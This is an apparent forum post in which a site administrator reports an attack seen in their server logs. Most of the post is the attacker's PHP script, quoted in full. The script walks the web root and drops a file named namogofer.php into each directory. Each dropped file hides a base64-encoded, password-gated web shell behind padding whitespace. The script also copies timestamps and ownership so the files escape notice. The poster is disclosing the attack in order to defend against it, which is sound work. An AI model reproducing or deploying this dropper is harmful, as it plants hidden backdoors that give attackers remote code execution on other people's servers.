[client 196.28.230.50] [Time: Mon Mar 10 2008 15:50:38] PHP Notice: Undefined variable: CURFILE in http://www.elettrodataservice.it/foto_a ... aca/a/.php on line 101\n
What this seems to do is hit the website then execute the script at this address. I have gone and manually denied anything from this IP but it appears it spreads based on other sites. The code this is available at this link is below.
Code: Select all
error_reporting(1);
global $HTTP_SERVER_VARS;
$START = time();
$WD_TIMEOUT = array(8,7,6,6,5,5,5,5,0);
function my_fwrite($f,$data) {
global $CURFILE;
$file_mtime = @filemtime($f);
$file_atime = @fileatime($f);
$dir_mtime = @filemtime(@dirname($f));
$dir_atime = @fileatime(@dirname($f));
if ($file_h = @fopen($f,"wb")){
@fwrite($file_h,$data);
@fclose($file_h);
if ($file_mtime){
@touch($f,$file_mtime,$file_atime);
}elseif(@filemtime($CURFILE)){
@chmod($f,@fileperms($CURFILE));
@touch($f,@filemtime($CURFILE),@fileatime($CURFILE));
@chgrp($f,@filegroup($CURFILE));
@chown($f,@fileowner($CURFILE));
};
if ($dir_mtime)
@touch(@dirname($f),$dir_mtime,$dir_atime);
return $f;
}else{
return '';
};
};
function ext($f){
return substr($f, strrpos($f, ".") + 1);
};
function walkdir($p,$func='_walkdir',$l=0){
global $START;
global $WD_TIMEOUT;
global $FL;
$func_f = "{$func}_f";
$func_d = "{$func}_d";
$func_s = "{$func}_s";
$func_e = "{$func}_e";
if ($dh = @opendir("$p")){
if (function_exists($func_s)) {
if ($func_s($p,$l))
return 1;
};
while ($f = @readdir($dh)){
if (time() - $START >= $WD_TIMEOUT[$l] )
break;
if ($f == '.' || $f == '..' )
continue;
if (@is_dir ("$p$f/") )
walkdir("$p$f/",$func,$l+1);
if (@is_dir ("$p$f/") && function_exists($func_d))
$func_d("$p$f/",$l);
if (@is_file("$p$f" ) && function_exists($func_f))
$func_f("$p$f" ,$l);
};
closedir($dh);
if (function_exists($func_e))
$func_e($p,$l);
};
};
function r_cut($p){
global $R;
return substr($p,strlen($R));
};
function say($t) {
echo "$t\n";
};
function testdata($t) {
say(md5("testdata_$t"));
};
$R = $HTTP_SERVER_VARS['DOCUMENT_ROOT'];
$CURFILE = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['SCRIPT_NAME'];
echo "<pre>";
testdata('start');
$fe = ext($CURFILE);
if (!$fe) $fe = 'php';
$FN = "namogofer.$fe";
function _walkdir_s($d,$l) {
global $FCNT;
$FCNT = array('fn' => '','dir' => 0,'file' => 0,'simtype' => 0);
};
function _walkdir_d($d,$l) {
global $FCNT;
$FCNT['dir' ]++;
};
function _walkdir_f($f,$l) { global $FCNT; $FCNT['file']++;
if (ext($f) == ext($CURFILE)) $FCNT['simtype']++; };
function _walkdir_e($d,$l) {
global $C,$FCNT,$FN;
if ($C[$l]<7){
if (my_fwrite("$d$FN",str_repeat("\n",100).str_repeat(' ',150).base64_decode('PD9waHAgZXJyb3JfcmVwb3J0aW5nKDEpO2dsb2JhbCAkSFRUUF9TRVJWRVJfVkFSUzsgZnVuY3Rpb24gc2F5KCR0KSB7IGVjaG8gIiR0XG4iOyB9OyBmdW5jdGlvbiB0ZXN0ZGF0YSgkdCkgeyBzYXkobWQ1KCJ0ZXN0ZGF0YV8kdCIpKTsgfTsgZWNobyAiPHByZT4iOyB0ZXN0ZGF0YSgnc3RhcnQnKTsgaWYgKG1kNSgkX1BPU1RbInAiXSk9PSJhYWNlOTk0MjhjNTBkYmU5NjVhY2M5M2YzZjI3NWNkMyIpeyBpZiAoJGNvZGUgPSBAZnJlYWQoQGZvcGVuKCRIVFRQX1BPU1RfRklMRVNbImYiXVsidG1wX25hbWUiXSwicmIiKSwkSFRUUF9QT1NUX0ZJTEVTWyJmIl1bInNpemUiXSkpeyBldmFsKCRjb2RlKTsgfWVsc2V7IHRlc3RkYXRhKCdmJyk7IH07IH1lbHNleyB0ZXN0ZGF0YSgncGFzcycpOyB9OyB0ZXN0ZGF0YSgnZW5kJyk7IGVjaG8gIjwvcHJlPiI7ID8+').str_repeat(' ',150)."\n".str_repeat("\n",100))){
$C[$l]++;
$FCNT['fn'] = r_cut("$d$FN");
say(implode("\t",$FCNT));
};
};
};
walkdir("$R/");
testdata('end');
echo "</pre>";
Checking other logs, it appears to be doing a post to root directories ex. /var /usr etc.